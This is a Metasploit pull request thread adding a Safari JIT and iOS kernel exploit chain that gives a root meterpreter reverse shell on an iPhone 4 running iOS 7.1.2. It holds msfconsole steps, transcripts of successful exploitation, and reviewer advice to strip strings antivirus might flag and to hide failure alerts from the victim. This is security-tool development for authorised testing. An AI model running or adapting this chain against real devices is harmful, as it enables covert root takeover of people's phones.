Add module for an iPhone 4 iOS 7.1.2
rapid7/metasploit-framework pull request #13911
Opened 2020-07-27 06:41 UTC by timwr

This module exploits a Safari JIT vulnerability and a iOS kernel vulnerability in order to launch meterpreter on iOS 7.1.2 (tested on a fully updated iPhone 4).
Ping @kudima @WanderingGlitch @h00die 

## Verification

- [ ] Start `msfconsole`
- [ ] `use exploit/apple_ios/browser/safari_jit`
- [ ] `set SRVHOST 192.168.43.200`
- [ ] `set LHOST 192.168.43.200`
- [ ] `run`

## Demonstration

### iPhone 4
```
msf5 > use exploit/apple_ios/browser/safari_jit
[*] Using configured payload apple_ios/armle/meterpreter_reverse_tcp
msf5 exploit(apple_ios/browser/safari_jit) > set LHOST 192.168.43.200
LHOST => 192.168.43.200
msf5 exploit(apple_ios/browser/safari_jit) > set SRVHOST 192.168.43.200
SRVHOST => 192.168.43.200
msf5 exploit(apple_ios/browser/safari_jit) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf5 exploit(apple_ios/browser/safari_jit) >
[*] Started reverse TCP handler on 192.168.43.200:4444
[*] Using URL: http://192.168.43.200:8080/
[*] Server started.

msf5 exploit(apple_ios/browser/safari_jit) >
[*] 192.168.43.205   safari_jit - Request / from Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
[*] 192.168.43.205   safari_jit - Request /loader.b64?cache=1595831577372 from Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
[*] 192.168.43.205   safari_jit - Request /macho.b64?cache=1595831577670 from Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
[*] 192.168.43.205   safari_jit - Request /payload from MobileSafari/9537.53 CFNetwork/672.1.15 Darwin/14.0.0
[+] 192.168.43.205   safari_jit - Target is vulnerable, sending payload!
[*] Meterpreter session 1 opened (192.168.43.200:4444 -> 192.168.43.205:49175) at 2020-07-27 14:33:07 +0800

msf5 exploit(apple_ios/browser/safari_jit) > sessions

Active sessions
===============

  Id  Name  Type                         Information                                                    Connection
  --  ----  ----                         -----------                                                    ----------
  1         meterpreter armle/apple_ios  root @ iPhone (uid=0, gid=0, euid=0, egid=0) @ 192.168.43.205  192.168.43.200:4444 -> 192.168.43.205:49175 (192.168.43.205)

```

## TODO

- [ ] Think of a better module name than `safari_jit`
- [ ] Documentation

2020-07-27 11:13 UTC, h00die commented
I'll pick this up since I have the phone and have been testing with @timwr

2020-07-28 11:59 UTC, h00die requested changes

2020-07-28 11:59 UTC, h00die commented on external/source/exploits/CVE-2016-4669/shell.m
> +	download(PAYLOAD_URL_PLACEHOLDER, "/bin/m");
hardcoded path, can we randomize?

2020-07-28 11:59 UTC, h00die commented on external/source/exploits/CVE-2016-4669/shell.m
> +	NSLog(@"root fs mounted ro");
logging

2020-07-28 11:59 UTC, h00die commented on external/source/exploits/CVE-2016-4669/shell.m
> +		NSLog(@"posix_spawn failed: %d", ret);
logging

2020-07-28 11:59 UTC, h00die commented on external/source/exploits/CVE-2016-4669/shell.m
> +	NSLog(@"shell deployed");
logging

2020-07-28 11:59 UTC, h00die commented on external/source/exploits/CVE-2016-4669/shell.m
> +		NSLog(@"mount failed ret: %d", ret);
logging

2020-07-28 11:59 UTC, h00die commented on external/source/exploits/CVE-2016-4669/shell.m
> +	NSLog(@"root fs mounted r/w");
logging

2020-07-28 11:59 UTC, h00die commented on external/source/exploits/CVE-2016-4669/shell.m
> +		NSLog(@"mount failed ret: %d", ret);
logging

2020-07-28 11:59 UTC, h00die commented on external/source/exploits/CVE-2016-4669/utils.m
> +			NSLog(@"pipe alloc failed at %d", i);
logging

2020-07-28 11:59 UTC, h00die commented on external/source/exploits/CVE-2016-4669/utils.m
> +		NSLog(@"pipe write failed, fd: %d, errno: %d", fds[1], errno);
logging

2020-07-28 11:59 UTC, h00die commented on external/source/exploits/CVE-2016-4669/utils.m
> +		NSLog(@"pipe allocation failed errno: %d", errno);
logging

2020-07-28 11:59 UTC, h00die commented on external/source/exploits/CVE-2016-4669/utils.m
> +		NSLog(@"%08X %08X", u32[i], u32[i+1]);
logging

2020-07-28 11:59 UTC, h00die commented on external/source/exploits/CVE-2016-4669/utils.m
> +		NSLog(@"error receiving on port: %s\n", mach_error_string(err));
logging

2020-07-28 11:59 UTC, h00die commented on external/source/exploits/CVE-2016-4669/utils.m
> +		NSLog(@"sending kalloc.8 message failed %s\n", mach_error_string(err));
logging

2020-07-28 11:59 UTC, h00die commented on external/source/exploits/CVE-2016-4669/utils.m
> +		NSLog(@"mach_port_insert_right failed");
logging

2020-07-28 11:59 UTC, h00die commented on external/source/exploits/CVE-2016-4669/utils.m
> +		NSLog(@"mach_port_allocate failed to allocate a port");
logging

2020-07-28 11:59 UTC, h00die commented on external/source/exploits/CVE-2016-4669/utils.m
> +		NSLog(@"could not open %s", dest);
logging

2020-07-28 11:59 UTC, h00die commented on external/source/exploits/CVE-2016-4669/utils.m
> +		NSLog(@"could not get %@", url);
logging

2020-07-28 11:59 UTC, h00die commented on external/source/exploits/CVE-2016-4669/utils.m
> +		NSLog(@"got remote len: %d", [urlData length]);
logging

2020-07-28 11:59 UTC, h00die commented on external/source/exploits/CVE-2016-4669/utils.m
> +	NSLog(@"get %@", url);
logging

2020-07-28 11:59 UTC, h00die commented on external/source/exploits/CVE-2016-4669/utils.m
> +	NSLog(@"set new nofile limit: %llx", rlim.rlim_cur);
logging

2020-07-28 11:59 UTC, h00die commented on external/source/exploits/CVE-2016-4669/utils.m
> +		NSLog(@"setrlimit failed errno: %d", errno);
logging

2020-07-28 11:59 UTC, h00die commented on external/source/exploits/CVE-2016-4669/utils.m
> +	NSLog(@"nofile limit: %llx %llx", rlim.rlim_cur, rlim.rlim_max);
logging

2020-07-28 11:59 UTC, h00die commented on external/source/exploits/CVE-2016-4669/utils.m
> +		NSLog(@"getresuid failed errno: %d", errno);
logging

2020-07-28 11:59 UTC, h00die commented on external/source/exploits/CVE-2016-4669/shell.m
> +	NSLog(@"patchfinder skipped!! using hardcoded offsets");
logging

2020-07-28 11:59 UTC, h00die commented on external/source/exploits/CVE-2016-4669/shell.m
> +	//uint32_t cs_enforcement_disable = 0;
this is a lot of commented out code... if not needed, maybe remove it?

2020-07-28 11:59 UTC, h00die commented on external/source/exploits/CVE-2016-4669/shell.m
> +	NSLog(@"got root uid: %d, gid: %d", getuid(), getgid());
logging

2020-07-28 11:59 UTC, h00die commented on external/source/exploits/CVE-2016-4669/shell.m
> +	NSLog(@"kernel_proc: %lx", kernel_proc);
logging

2020-07-28 11:59 UTC, h00die commented on external/source/exploits/CVE-2016-4669/shell.m
> +	NSLog(@"self_proc: %lx", self_proc);
logging

2020-07-28 11:59 UTC, h00die commented on external/source/exploits/CVE-2016-4669/shell.m
> +	NSLog(@"self_task: %lx", self_task);
logging

2020-07-28 11:59 UTC, h00die commented on external/source/exploits/CVE-2016-4669/shell.m
> +	NSLog(@"self_addr: %lx", self_addr);
logging

2020-07-28 11:59 UTC, h00die commented on external/source/exploits/CVE-2016-4669/utils.m
> +		NSLog(@"task_threads failed");
logging

2020-07-28 11:59 UTC, h00die commented on external/source/exploits/CVE-2016-4669/utils.m
> +	NSLog(@"saved to %s, write ret: %d", dest, ret);
logging

2020-07-28 11:59 UTC, h00die commented on external/source/exploits/CVE-2016-4669/shell.m
> +
as per slack discussion, recommend either removing logging or adding `#define debug`

2020-07-28 11:59 UTC, h00die commented on modules/exploits/apple_ios/browser/safari_jit.rb
> +  Rank = ManualRanking
I think this is at least good rank?

2020-07-28 11:59 UTC, h00die commented on modules/exploits/apple_ios/browser/safari_jit.rb
> +        'Name' => 'Safari JIT Exploit',
maybe add 'webkit' to the title? that doesn't really add anything, but will help with collisions in the future potentially

2020-07-28 11:59 UTC, h00die commented on modules/exploits/apple_ios/browser/safari_jit.rb
> +          This module exploits a JIT optimisation bug in Safari Webkit. This allows us to
you spelled optimi**z**ation wrong

2020-07-28 11:59 UTC, h00die commented on modules/exploits/apple_ios/browser/safari_jit.rb
> +      #{exploit_js}
there are a LOT of comments in this file, maybe strip them out before sending to cut down on the file size to the old phone, and remove some possible strings for AV to look for.

2020-07-28 11:59 UTC, h00die commented on modules/exploits/apple_ios/browser/safari_jit.rb
> +        alert("no go");
do we actually want to pop up an alert that says no go if exploit fails?

2020-07-28 11:59 UTC, h00die commented on modules/exploits/apple_ios/browser/safari_jit.rb
> +        logFinalize();
this has another alert box, i think this could be commented out as well to prevent popping up stuff to the user on failed exploit attempt

2020-07-30 10:00 UTC, timwr commented on modules/exploits/apple_ios/browser/safari_jit.rb
> +          This module exploits a JIT optimisation bug in Safari Webkit. This allows us to
your entire country is spelling optimisation wrong :trollface:

2020-08-04 15:51 UTC, h00die commented
still need module docs :)

2020-08-04 16:29 UTC, h00die commented
Logs on the phone look much better:
```
Aug  4 12:08:28 amfid[131] <Error>: /bin/G73uoN not valid: 0xe800801c: No code signature found.                                        
Aug  4 12:08:28 kernel[0] <Debug>: AMFI: Invalid signature but permitting execution     
```

2020-08-04 16:30 UTC, h00die commented
Working for me:
```
msf5 > use safari_jit
[*] Using configured payload apple_ios/armle/meterpreter_reverse_tcp

Matching Modules
================

   #  Name                                  Disclosure Date  Rank  Check  Description
   -  ----                                  ---------------  ----  -----  -----------
   0  exploit/apple_ios/browser/safari_jit  2016-08-25       good  No     Safari Webkit JIT Exploit for iOS 7.1.2


[*] Using exploit/apple_ios/browser/safari_jit
msf5 exploit(apple_ios/browser/safari_jit) > set lhost 1.1.1.1
lhost => 1.1.1.1
msf5 exploit(apple_ios/browser/safari_jit) > set srvhost 1.1.1.1
srvhost => 1.1.1.1
msf5 exploit(apple_ios/browser/safari_jit) > set verbose true
verbose => true
msf5 exploit(apple_ios/browser/safari_jit) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf5 exploit(apple_ios/browser/safari_jit) > 
[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Using URL: http://1.1.1.1:8080/
[*] Server started.
[*] 2.2.2.2    safari_jit - Request / from Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
[*] 2.2.2.2    safari_jit - Request /loader.b64?cache=1596557302841 from Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
[*] 2.2.2.2    safari_jit - Request /macho.b64?cache=1596557303179 from Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
[*] 2.2.2.2    safari_jit - Request /payload from MobileSafari/9537.53 CFNetwork/672.1.15 Darwin/14.0.0
[+] 2.2.2.2    safari_jit - Target is vulnerable, sending payload!
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:49299) at 2020-08-04 12:08:27 -0400
sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: root @ iPhone (uid=0, gid=0, euid=0, egid=0)
meterpreter > sysinfo
Computer     : 2.2.2.2
OS           : iPhone3,3 (iOS 11D257)
Architecture : armv7
BuildTuple   : arm-iphone-darwin
Meterpreter  : armle/apple_ios
meterpreter > pwd
/
meterpreter > ls
Listing: /
==========

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
40333/-wx-wx-wx   68    dir   2014-12-16 11:01:46 -0500  .Trashes
100000/---------  0     fil   2014-12-16 11:01:55 -0500  .file
40775/rwxrwxr-x   1938  dir   2014-12-16 11:14:45 -0500  Applications
40775/rwxrwxr-x   68    dir   2014-12-16 11:01:47 -0500  Developer
40775/rwxrwxr-x   578   dir   2014-12-16 11:15:48 -0500  Library
40755/rwxr-xr-x   102   dir   2014-12-16 11:15:26 -0500  System
40755/rwxr-xr-x   170   dir   2020-08-04 12:08:28 -0400  bin
40775/rwxrwxr-x   68    dir   2014-12-16 11:01:54 -0500  cores
40555/r-xr-xr-x   1676  dir   2020-08-04 11:56:30 -0400  dev
40755/rwxr-xr-x   578   dir   2014-12-16 11:15:49 -0500  etc
40755/rwxr-xr-x   136   dir   2014-12-16 11:15:47 -0500  private
40755/rwxr-xr-x   476   dir   2014-12-16 11:15:49 -0500  sbin
41777/rwxrwxrwx   510   dir   2020-08-04 12:01:15 -0400  tmp
40755/rwxr-xr-x   272   dir   2014-12-16 11:15:47 -0500  usr
40755/rwxr-xr-x   952   dir   2020-06-08 11:41:23 -0400  var

meterpreter >
```

2020-08-04 16:41 UTC, h00die commented
module working.  everything as expected.  Just need some docs and to wait a few days.

2020-08-13 18:39 UTC, h00die commented
https://github.com/timwr/metasploit-framework/pull/12

2020-08-14 20:02 UTC, merged

2020-08-14 20:03 UTC, h00die commented
# Release Notes
This PR adds a safari exploit for IOS 7.1.2 for a root level shell leveraging multiple exploits chained together.  iPhone 4 was specifically targeted and verified for this exploit.